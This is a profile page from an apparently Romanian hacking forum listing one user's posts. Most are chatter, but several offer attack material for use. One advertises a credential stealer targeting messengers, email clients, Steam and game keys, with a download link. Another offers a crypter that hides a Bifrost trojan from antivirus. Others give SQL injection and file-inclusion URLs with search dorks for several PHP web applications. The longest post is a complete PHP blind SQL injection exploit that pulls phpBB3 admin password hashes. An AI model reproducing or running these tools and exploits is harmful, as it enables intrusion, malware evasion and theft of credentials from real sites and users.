Jump to content

Ras

Active Members
  • Posts

    1106
  • Joined

  • Last visited

  • Days Won

    1

Everything posted by Ras

  1. cauta acel .ocx pe google, downloadeaza-l si punel in folderul cu clientul. EDIT sau poti sa pui acel .ocx in system32 si nu o sa iti mai zica niciun program ca lipseste acel .ocx
  2. stiu ca exista un program cu care poti sa copiezi vocea dintr-o melodie. dar cica se aude cam nasol adica nu e calitatea buna.
  3. Link: http://www.youtube.com/watch?v=VtEFWyo4iJo&mode=related&search= am tras o "portie" de ras
  4. Ras

    xe0nre

    welcome! o sa te ajutam cum putem
  5. Ras

    Elite Socks 5

    Proxy - 12 Sept 2007 213.170.40.76:8080 213.170.40.76:80 213.170.40.76:3128 91.121.67.145:8080 193.30.164.3:80 195.175.37.70:8080 194.160.198.4:3128 89.149.164.130:3128 195.175.37.70:80 195.175.37.71:8080 140.247.53.18:80 213.160.129.52:3128 75.126.208.243:8080 66.162.135.6:80 149.142.90.225:80 212.25.95.135:80 200.65.0.25:3128 209.59.95.52:80 209.59.95.52:3128 200.65.0.25:80 70.97.43.138:11111 200.196.108.27:3128 203.69.39.251:80 203.69.39.250:80 151.204.42.140:8080 62.215.195.85:80 189.20.195.42:3128 66.98.238.8:3128 220.225.231.98:3128 211.115.115.220:8080 218.108.64.166:80 217.11.21.4:80 218.75.68.205:8080 122.153.25.130:3128 190.4.8.170:8080 196.36.198.91:80 124.138.131.3:3128 211.0.61.226:3128 125.246.154.66:3128 61.166.68.74:80 122.203.24.194:3128 203.160.1.50:554 203.160.1.40:554 203.160.1.44:553 200.171.25.62:3128 203.160.1.48:553 203.160.1.40:553 203.160.1.52:554 203.160.1.52:553 202.6.158.247:8080 218.106.254.79:80 189.4.208.139:3128 147.243.236.59:8080 210.212.95.103:8080 200.193.222.104:3128 61.6.69.62:3128 125.246.56.194:3128 125.243.201.2:8080 210.212.78.67:8080 122.153.7.130:3128 203.99.127.3:3128 222.88.75.243:3128 65.160.200.230:8080 219.139.35.71:3128 61.139.94.203:3128 200.148.212.246:3128 218.8.129.252:8000 84.22.67.115:80 203.66.115.133:3128 222.89.169.73:3128 122.153.16.66:3128 125.46.61.39:3128 80.73.73.178:3128 221.226.124.121:3128 212.11.182.2:80 122.203.17.130:3128 62.192.142.90:8080 85.33.42.189:3128 200.129.43.168:3128 62.90.252.49:3128 213.55.94.114:3128 220.130.112.6:3128 125.243.140.66:8080 201.11.156.196:3128 213.39.246.138:3128 195.175.37.71:80 84.254.206.168:3128 203.160.001.146:554 189.19.18.36:3128 201.18.29.130:3128 203.160.1.44:554 202.143.112.130:808 201.245.151.146:80 222.85.106.20:3128 189.19.241.229:80 210.19.150.3:3128 221.209.18.18:8000 222.221.254.162:3128 122.203.155.130:3128 88.249.250.156:8080 200.101.81.130:3128 12.40.36.72:8000 84.41.249.49:80 202.170.51.11:8080 201.116.14.99:8080 193.110.89.3:8080 202.83.125.131:3128 193.255.187.1:8080
  6. venom tu nu mai ai cum sa iti iei contul inapoi decat daca vorbesti cu cel care ti l-a spart. cum ti l-a spart? te-ai logat pe o pagina falsa de yahoo? ai primit vreun fisier .exe de la cineva? sa va intre si voua in cap ca nicio parola de yahoo nu se sparge direct (adica pui id si poc iti da pass)
  7. Ras

    PowerCrypt V2

    nu
  8. PW Messanger Packet -MSN Messenger -Windows Messenger -Yahoo Messenger (Version 5.x und 6.x) -Google Talk -ICQ Lite 4.x/5.x/2003 -AOL Instand Messenger/Netscape 7 -Trilian -Miranda -GAIM PW Mail Packet -Outlook Express -Microsoft Outlook 2000/XP/2003 -IncrediMail -Mozilla Thunderbird -Netscape 6.x/7.x -Group Mail Free, Gmail -Yahoo Mail -Hotmail / MSN Mail -Eudora Protected Storage PW Packet -Outlook Passwords -Auto Completet password in IE -Password protected sites in IE -MSN Explorer Passwords Steam PW Packet -Steam Username -Steam Password -Steam game-path Game Key Stealer -UT 2003/2004 -Battlefield 1942 / Road to Rome / Scret Weapons / Vietnam -Need for Speed Hot Pursuit 2 -James Bond 007 Nightfire -Command & Conquer Generals / Zero Hour -SimCity 4 -Call of Duty 2 / United Offensive / 1 -SWAT 4 / EXP Windows Info Packet Windows Username, Windows Computername ect. ect. Download: http://rapidshare.com/files/54896185/UnLimited_PW_-_Stealer_0.40.rar
  9. Ras

    PowerCrypt V2

    da
  10. Bifrost server Resultaat: 0/32 (0%) AhnLab-V3 2007.9.8.0 2007.09.07 - AntiVir 7.6.0.5 2007.09.09 - Authentium 4.93.8 2007.09.09 - Avast 4.7.1043.0 2007.09.08 - AVG 7.5.0.485 2007.09.09 - BitDefender 7.2 2007.09.09 - CAT-QuickHeal 9.00 2007.09.08 - ClamAV 0.91.2 2007.09.09 - DrWeb 4.33 2007.09.09 - eSafe 7.0.15.0 2007.09.04 - eTrust-Vet 31.1.5119 2007.09.08 - Ewido 4.0 2007.09.09 - FileAdvisor 1 2007.09.10 - Fortinet 3.11.0.0 2007.09.08 - F-Prot 4.3.2.48 2007.09.09 - F-Secure 6.70.13030.0 2007.09.09 - Ikarus T3.1.1.12 2007.09.09 - Kaspersky 4.0.2.24 2007.09.09 - McAfee 5115 2007.09.07 - Microsoft 1.2803 2007.09.09 - NOD32v2 2516 2007.09.09 - Norman 5.80.02 2007.09.07 - Panda 9.0.0.4 2007.09.09 - Prevx1 V2 2007.09.10 - Rising 19.39.62.00 2007.09.09 - Sophos 4.21.0 2007.09.09 - Sunbelt 2.2.907.0 2007.09.07 - Symantec 10 2007.09.09 - TheHacker 6.1.10.182 2007.09.08 - VBA32 3.12.2.4 2007.09.09 - VirusBuster 4.3.26:9 2007.09.09 - Webwasher-Gateway 6.0.1 2007.09.09 - Extra informatie File size: 22967 bytes MD5: e1d330c5a0dcb7f5095937fb13eb6b7f SHA1: 3526e906354b07527b218709b2496868760de140 First button: add The second button: delete The third button: new project The fourth button: about Download: http://rapidshare.com/files/54787756/PowerCrypt_v2.0.rar
  11. Am sa va sparg la toti aidiurile pt ca is hacer. :twisted: :twisted: :twisted:
  12. ## Owner : Pr0T3cT10n ## Email : [email]Pr0T3cT10n@Gmail.Com[/email] ## Homepage : [url]www.kamikaz-team.com[/url] ## Script site : [url]http://www.phpnuke.org[/url] ## Script download : [url]http://www.spchat.org/modules.php?name=Downloads&d_op=getit&lid=19[/url] ## Script name : PHP-Nuke module(SPChat) ## Version : All ## Type : SQL Injection ## D0rk : inurl:name=SPChat ## Description : ## Pull out user details from the database ## Vuln : ## [url]http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=[/url][SQL Injection] ## [url]http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=0+UNION+SELECT+pwd,2,3,4,5,6,7,8+FROM+nuke_authors+LIMIT+0,1[/url] ## NOTE : ## You need to be a regular user ## Thanks to some friend of mine..
  13. ######################################################################## # RW::Download v2.0.3 lite - Remote SQL Injection # Vendor : [url]http://www.rwscripts.com/[/url] # Ditemukan oleh : k1tk4t - k1tk4t[4t]newhack.org # Lokasi : Indonesia -- #newhack[dot]org @ irc.dal.net # Dork : "Powered by RW::Download v2.0.3 lite" ################################################# [url]http://localhost/UPLOAD/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*[/url] http://localhost/UPLOAD/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*
  14. --------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- [url]Http://www.inj3ct-it.org[/url] Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- Multiple Remote File Inclusion Vulnerability --------------------------------------------------------------- # Author: MhZ91 [email]nobody.91@hotmail.it[/email] # Download Script: [url]http://sourceforge.net/projects/offl/[/url] Online Fantasy Football League 0.2.6 # Exploit: # [url]http://[target]/[/url][path]/lib/functions.php?DOC_ROOT=[Shell] # [url]http://[target]/[/url][path]/lib/header.php?DOC_ROOT=[Shell] ---------------------------------------------------------------
  15. Here is a 0day sql injection for phpmyforum, admin hash disclosure. You need to register and post a message to make it work. This forum is completely in german, so it's a little hard to work with (if you're ignorant like me and don't know any other langs). 1. Register at forum. 2. Post a message in any forum. 3. Open the url, replacing "24" with the id of your post. Codice: http://target/editpost.php?id=24+union+select+concat(char(58,58,5Cool,id,char(58,58,5Cool,pass,char(58,58,5 Cool),id+from+pmf_user+where+group_id=1+order+by+1+asc+/* 4. The id and md5 hash should appear in the textarea on this page. It will look like: :::1:::21232f297a57a5a743894a0e4a801fc3:::
  16. #!/usr/bin/php -q -d short_open_tag=on <? echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n"; echo "by rgod [email]rgod@autistici.org[/email]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n"; /* works regardless of php.ini settings you need a global moderator account with "simple moderator" role */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n"; echo "host: target server (ip/hostname)\n"; echo "path: path to phpbb3\n"; echo "user/pass: u need a valid user account with global moderator rights\n"; echo "Options:\n"; echo " -T[prefix] specify a table prefix different from default (phpbb_)\n"; echo " -p[port]: specify a port other than 80\n"; echo " -P[ip:port]: specify a proxy\n"; echo " -u[number]: specify a user id other than 2 (admin)\n"; echo " -x: disclose table prefix through error messages\n"; echo "Example:\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n"; echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n"; die; } error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=" .";} else {$result.=" ".$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=" ".dechex(ord($string[$i]));} else {$exa.=" 0".dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} } return $exa."\r\n".$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\'; function sendpacketii($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo "\r\n".$html; } $host=$argv[1]; $path=$argv[2]; $user=$argv[3]; $pass=$argv[4]; $port=80; $prefix="PHPBB_"; $user_id="2";//admin $discl=0; $proxy=""; for ($i=3; $i<=$argc-1; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if ($temp=="-p") { $port=str_replace("-p","",$argv[$i]); } if ($temp=="-P") { $proxy=str_replace("-P","",$argv[$i]); } if ($temp=="-T") { $prefix=str_replace("-T","",$argv[$i]); } if ($temp=="-u") { $user_id=str_replace("-u","",$argv[$i]); } if ($temp=="-x") { $discl=1; } } if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} $data="username=".urlencode($user); $data.="&password=".urlencode($pass); $data.="&redirect=index.php"; $data.="&login=Login"; $packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n"; $packet.="Referer: http://$host$path/ucp.php?mode=login\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; sendpacketii($packet); $cookie=""; $temp=explode("Set-Cookie: ",$html); for ($i=1; $i<=count($temp)-1; $i++) { $temp2=explode(" ",$temp[$i]); $cookie.=" ".$temp2[0]; } if (eregi("_u=1;",$cookie)) { //echo $html."\n";//debug //die("Unable to login..."); } echo "cookie -> ".$cookie."\r\n"; if ($discl) { $sql="'suntzuuuuu"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (strstr($html,"You have an error in your SQL syntax")) { $temp=explode("posts",$html); $temp2=explode(" ",$temp[0]); $prefix=strtoupper($temp2[count($temp2)-1]); echo "prefix -> ".$prefix."\n";sleep(2); } } $md5s[0]=0;//null $md5s=array_merge($md5s,range(48,57)); //numbers $md5s=array_merge($md5s,range(97,102));//a-f letters //print_r(array_values($md5s)); $j=1;$password=""; while (!strstr($password,chr(0))) { for ($i=0; $i<=255; $i++) { if (in_array($i,$md5s)) { $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;} } if ($i==255) {die("Exploit failed...");} } $j++; } $j=1;$admin=""; while (!strstr($admin,chr(0))) { for ($i=0; $i<=255; $i++) { $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999"; echo "sql -> ".$sql."\n"; $sql=urlencode(strtoupper($sql)); $data="username="; $data.="&icq="; $data.="&email="; $data.="&aim="; $data.="&joined_select=lt"; $data.="&joined="; $data.="&yahoo="; $data.="&active_select=lt"; $data.="&active="; $data.="&msn="; $data.="&count_select=eq"; $data.="&count="; $data.="&jabber="; $data.="&sk=c"; $data.="&sd=a"; $data.="&ip=".$sql; $data.="&search_group_id=0"; $data.="&submit=Search"; $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n"; $packet.="Content-Type: application/x-www-form-urlencoded\r\n"; $packet.="Host: ".$host."\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n"; $packet.="Cookie: ".$cookie." \r\n\r\n"; $packet.=$data; sendpacketii($packet); if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;} } if ($i==255) {die("Exploit failed...");} $j++; } echo "--------------------------------------------------------------------\r\n"; echo "admin -> ".$admin."\r\n"; echo "password (md5) -> ".$password."\r\n"; echo "--------------------------------------------------------------------\r\n"; function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($password)) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?>
  17. scrieti "tits"
  18. Mai sunt si mass-urile alea in care iti moare tot neamu. IMPOSIBIL. Mai sunt si mass-urile alea in care se inchide yahoo. Sa inchida odata yahoo asta.
  19. http://www.youtube.com/watch?v=jivAOvzTjhM&NR=1 uitati-va aici pana la capat :lol::lol:
  20. 5. Nu se posteaza NIMIC in legatura cu: - carti de credit - conturi paypal - conturi Western Union - conturi ebay nu trebuia sa iti zic eu asta...
  21. a fost simplu... trebuia sa pui programul la challenges...
  22. ne spui si noua ce program este sau o poza ceva.
  23. "exploit" ddos! pur si simplu pica forumul! desi nu creca ca merge daca ii activat captcha nu ati citit ce a scris kwe.
  24. vedeti si voi care e diferenta
  25. Ras

    Kre@toR

    welcome... tu esti kreator de pe mt nu?
×
×
  • Create New...